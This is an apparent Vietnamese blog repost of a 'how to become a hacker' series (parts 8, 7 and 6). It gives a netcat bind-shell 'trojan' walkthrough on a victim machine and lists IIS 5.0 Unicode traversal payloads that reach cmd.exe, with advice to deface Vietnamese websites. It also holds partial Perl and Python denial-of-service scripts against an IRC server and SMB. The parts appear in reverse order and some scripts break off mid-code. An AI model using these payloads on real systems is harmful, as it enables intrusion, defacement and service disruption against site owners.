Thứ Hai, 30 tháng 5, 2016

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 8

47.)  Các công cụ cần thiết để hack Web : 
Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình : 
Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) .
Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.ht ml
http://www.ultrashell.net/

Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .
Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó.
Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .
Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl .
Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng.
Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của Windows NT/2000 .
Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48.)  Hướng dẫn sử dụng Netcat : 

a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat .
b . ) Biên dịch : 
_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE
#define TELNET

- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
c . ) Các tùy chọn của Netcat : 
_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE
C:\ > nc -h
connect to somewhere: nc [-options] hostname port  [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h ----------- gọi hướng dẫn
-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L ------------ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o ------------ file ghi nhật kí vào file
-p port ----- chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr ----- giả mạo địa chỉ IP nguồn là addr
-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u ------------- dùng UDP(mặc định netcat dùng TCP)
-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.
-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z ------------- chế độ zero I/O, thường được sử dụng khi scan port


Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD : 

_ Chộp banner của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE
C:\ > nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ
cho biết các thông tin chi tiết hơn nữa)

C:\ > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

_ Quét cổng :
Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1- > 500) của host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


nếu bạn cần scan các cổng UDP, dùng -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open


_ Biến Netcat thành một trojan :
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

CODE
E:\ > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

CODE
C:\ > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\ > cd test
cd test
E:\test > dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test > exit
exit
sent 20, rcvd 450: NOTSOCK


Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E:\ > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?


Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\ > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?


Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49.)  Kỹ thuật hack IIS server 5.0 : 

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

GOOKLUCK!!!!!!!!!!!!!!! 


Theo quantrimang.com

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

42 . )  Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : 
 
WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667. 
 Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: 
 

 
Nếu bạn dùng Unix: 
 
 [hellme@die-communitech.net$ telnet irc.example.com 6667 
 Trying example.com... 
 Connected to example.com. 
 Escape character is `^]`. 
 [buffer] 
 
 Windows cũng tương tự: 
 
 telnet irc.example.com 6667 
 
 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự . 
 Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ): 
 
 CODE 
 #!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl 
 use Getopt::Std; 
 use Socket; 
 getopts(`s:`, \%args); 
 if(!defined($args{s})){&usage;} 
 my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto); 
 $foo = ``A``; # Đây là NOP 
 $number = ``65000``; # Đây là tất cả số NOP 
 $data .= $foo x $number; # kết quả của $foo times $number 
 $serv = $args{s}; # lệnh điều khiển server từ xa 
 $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667 
 $buf = ``$data``; 
 $in_addr = (gethostbyname($serv))[4]

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 6

38.) DoS attack là gì? ( Denial Of Services Attack ) 
DoS attack ( dịch là tấn công từ chối dịch vụ ) là kiểu tấn công rất lợi hại , với loại tấn công này , bạn chỉ cần một máy tính kết nối Internet là đã có thể thực hiện việc tấn công được máy tính của đốI phương . thực chất của DoS attack là hacker sẽ chiếm dụng một lượng lớn tài nguyên trên server ( tài nguyên đó có thể là băng thông, bộ nhớ, cpu, đĩa cứng, ... ) làm cho server không thể nào đáp ứng các yêu cầu từ các máy của nguời khác ( máy của những người dùng bình thường ) và server có thể nhanh chóng bị ngừng hoạt động, crash hoặc reboot . 


39.) Các loại DoS attack hiện đang được biết đến và sử dụng : 


a . ) Winnuke : 

_DoS attack loại này chỉ có thể áp dụng cho các máy tính đang chạy Windows9x . Hacker sẽ gởi các gói tin với dữ liệu ``Out of Band`` đến cổng 139 của máy tính đích.( Cổng 139 chính là cổng NetBIOS, cổng này chỉ chấp nhận các gói tin có cờ Out of Band được bật ) . Khi máy tính của victim nhận được gói tin này, một màn hình xanh báo lỗi sẽ được hiển thị lên với nạn nhân do chương trình của Windows nhận được các gói tin này nhưng nó lại không biết phản ứng với các dữ liệu Out Of Band như thế nào dẫn đến hệ thống sẽ bị crash . 

b . ) Ping of Death : 

_ Ở kiểu DoS attack này , ta chỉ cần gửi một gói dữ liệu có kích thước lớn thông qua lệnh ping đến máy đích thì hệ thống của họ sẽ bị treo . 
_ VD : ping –l 65000 

c . ) Teardrop : 
_ Như ta đã biết , tất cả các dữ liệu chuyển đi trên mạng từ hệ thống nguồn đến hệ thống đích đều phải trải qua 2 quá trình : dữ liệu sẽ được chia ra thành các mảnh nhỏ ở hệ thống nguồn, mỗi mảnh đều phải có một giá trị offset nhất định để xác định vị trí của mảnh đó trong gói dữ liệu được chuyển đi. Khi các mảnh này đến hệ thống đích, hệ thống đích sẽ dựa vào giá trị offset để sắp xếp các mảnh lại với nhau theo thứ tự đúng như ban đầu . Lợi dụng sơ hở đó , ta chỉ cần gởi đến hệ thống đích một loạt gói packets với giá trị offset chồng chéo lên nhau. Hệ thống đích sẽ không thể nào sắp xếp lại các packets này, nó không điều khiển được và có thể bị crash, reboot hoặc ngừng hoạt động nếu số lượng gói packets với giá trị offset chồng chéo lên nhau quá lớn ! 

d . ) SYN Attack : 

_ Trong SYN Attack, hacker sẽ gởi đến hệ thống đích một loạt SYN packets với địa chỉ ip nguồn không có thực. Hệ thống đích khi nhận được các SYN packets này sẽ gởi trở lại các địa chỉ không có thực đó và chờ đợI để nhận thông tin phản hồi từ các địa chỉ ip giả . Vì đây là các địa chỉ ip không có thực, nên hệ thống đích sẽ sẽ chờ đợi vô ích và còn đưa các ``request`` chờ đợi này vào bộ nhớ , gây lãng phí một lượng đáng kể bộ nhớ trên máy chủ mà đúng ra là phải dùng vào việc khác thay cho phải chờ đợi thông tin phản hồi không có thực này . Nếu ta gởi cùng một lúc nhiều gói tin có địa chỉ IP giả như vậy thì hệ thống sẽ bị quá tải dẫn đến bị crash hoặc boot máy tính . == > ném đá dấu tay . 

e . ) Land Attack : 

_ Land Attack cũng gần giống như SYN Attack, nhưng thay vì dùng các địa chỉ ip không có thực, hacker sẽ dùng chính địa chỉ ip của hệ thống nạn nhân. Điều này sẽ tạo nên một vòng lặp vô tận giữa trong chính hệ thống nạn nhân đó, giữa một bên cần nhận thông tin phản hồi còn một bên thì chẳng bao giờ gởi thông tin phản hồi đó đi cả . == > Gậy ông đập lưng ông . 

f . ) Smurf Attack : 

_Trong Smurf Attack, cần có ba thành phần: hacker (người ra lệnh tấn công), mạng khuếch đại (sẽ nghe lệnh của hacker) và hệ thống của nạn nhân. Hacker sẽ gởi các gói tin ICMP đến địa chỉ broadcast của mạng khuếch đại. Điều đặc biệt là các gói tin ICMP packets này có địa chỉ ip nguồn chính là địa chỉ ip của nạn nhân . Khi các packets đó đến được địa chỉ broadcast của mạng khuếch đại, các máy tính trong mạng khuếch đại sẽ tưởng rằng máy tính nạn nhân đã gởi gói tin ICMP packets đến và chúng sẽ đồng loạt gởi trả lại hệ thống nạn nhân các gói tin phản hồi ICMP packets. Hệ thống máy nạn nhân sẽ không chịu nổi một khối lượng khổng lồ các gói tin này và nhanh chóng bị ngừng hoạt động, crash hoặc reboot. Như vậy, chỉ cần gởi một lượng nhỏ các gói tin ICMP packets đi thì hệ thống mạng khuếch đại sẽ khuếch đại lượng gói tin ICMP packets này lên gấp bộI . Tỉ lệ khuếch đại phụ thuộc vào số mạng tính có trong mạng khuếch đạI . Nhiệm vụ của các hacker là cố chiếm được càng nhiều hệ thống mạng hoặc routers cho phép chuyển trực tiếp các gói tin đến địa chỉ broadcast không qua chỗ lọc địa chỉ nguồn ở các đầu ra của gói tin . Có được các hệ thống này, hacker sẽ dễ dàng tiến hành Smurf Attack trên các hệ thống cần tấn công . == > một máy làm chẳng si nhê , chục máy chụm lại ta đành chào thua . 

g . ) UDP Flooding : 

_ Cách tấn công UDP đòi hỏi phải có 2 hệ thống máy cùng tham gia. Hackers sẽ làm cho hệ thống của mình đi vào một vòng lặp trao đổi các dữ liệu qua giao thức UDP. Và giả mạo địa chỉ ip của các gói tin là địa chỉ loopback ( 127.0.0.1 ) , rồi gởi gói tin này đến hệ thống của nạn nhân trên cổng UDP echo ( 7 ). Hệ thống của nạn nhân sẽ trả lời lại các messages do 127.0.0.1( chính nó ) gởi đến , kết quả là nó sẽ đi vòng một vòng lặp vô tận. Tuy nhiên, có nhiều hệ thống không cho dùng địa chỉ loopback nên hacker sẽ giả mạo một địa chỉ ip của một máy tính nào đó trên mạng nạn nhân và tiến hành ngập lụt UDP trên hệ thống của nạn nhân . Nếu bạn làm cách này không thành công thì chính máy của bạn sẽ bị đấy . 

h . ) Tấn công DNS : 

_ Hacker có thể đổi một lối vào trên Domain Name Server của hệ thống nạn nhân rồi cho chỉ đến một website nào đó của hacker. Khi máy khách yêu cầu DNS phân tích địa chỉ bị xâm nhập thành địa chỉ ip, lập tức DNS ( đã bị hacker thay đổi cache tạm thờI ) sẽ đổi thành địa chỉ ip mà hacker đã cho chỉ đến đó . Kết quả là thay vì phải vào trang Web muốn vào thì các nạn nhân sẽ vào trang Web do chính hacker tạo ra . Một cách tấn công từ chối dịch vụ thật hữu hiệu !. 

g . ) Distributed DoS Attacks ( DDos ) : 

_ DDoS yêu cầu phải có ít nhất vài hackers cùng tham gia. Đầu tiên các hackers sẽ cố thâm nhập vào các mạng máy tính được bảo mật kém, sau đó cài lên các hệ thống này chương trình DDoS server. Bây giờ các hackers sẽ hẹn nhau đến thời gian đã định sẽ dùng DDoS client kết nối đến các DDoS servers, sau đó đồng loạt ra lệnh cho các DDoS servers này tiến hành tấn công DDoS đến hệ thống nạn nhân . 

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) : 

_ Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấn công bằng nhiều máy tính thì ngườI tấn công chỉ cần dùng một máy tấn công thông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địa chỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất , nhanh nhất và có đường truyền rộng nhất như Yahoo .v.v… , các server này sẽ phản hồi các gói tin đó đến địa chỉ của victim . Việc cùng một lúc nhận được nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽn đường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cách tấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giản với đường truyền bình thường cũng có thể đánh bật được hệ thống có đường truyền tốt nhất thế giớI nếu như ta không kịp ngăn chặn . Trang Web HVA của chúng ta cũng bị DoS vừa rồi bởi cách tấn công này đấy . 

40 . ) Kỹ thuật DoS Web bằng Python : 

_ Kỹ thuật này chỉ có thể sử dụng duy nhất trên WinNT , và bạn cần phải có thời gian thì máy tính của nạn nhân mới bị down được . 
_ Bạn hãy download Pyphon tại http://www.python.org/ để sử dụng . 
_ Bạn hãy save đoạn mã sau lên file rfpoison.py . 

CODE 
import string 
import struct 
from socket import * 
import sys 
def a2b(s): 
bytes = map(lambda x: string.atoi(x, 16), 
string.split(s)) 
data = string.join(map(chr, bytes), ``) 
return data 
def b2a(s): 
bytes = map(lambda x: `%.2x` % x, map(ord, s)) 
return string.join(bytes, ` `) 

# Yêu cầu tập hợp NBSS 
nbss_session = a2b(`````` 
81 00 00 48 20 43 4b 46 44 45 
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43 
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46 
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00 
00 00 
``````) 

# Tạo SMB 
crud = ( 
# Yêu cầu SMBnegprot 
`````` 
ff 53 4d 42 72 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43 
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d 
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d 
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b 
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d 
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e 
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 
``````, 
# Yêu cầu setup SMB X 
`````` 
ff 53 4d 42 73 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff 
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00 
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f 
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00 
``````, 
# Yêu cầu SMBtconX 
`````` 
ff 53 4d 42 75 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56 
45 52 5c 49 50 43 24 00 49 50 43 00 
``````, 
# Yêu cầu khởI tạo SMBnt X 
`````` 
ff 53 4d 42 a2 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 
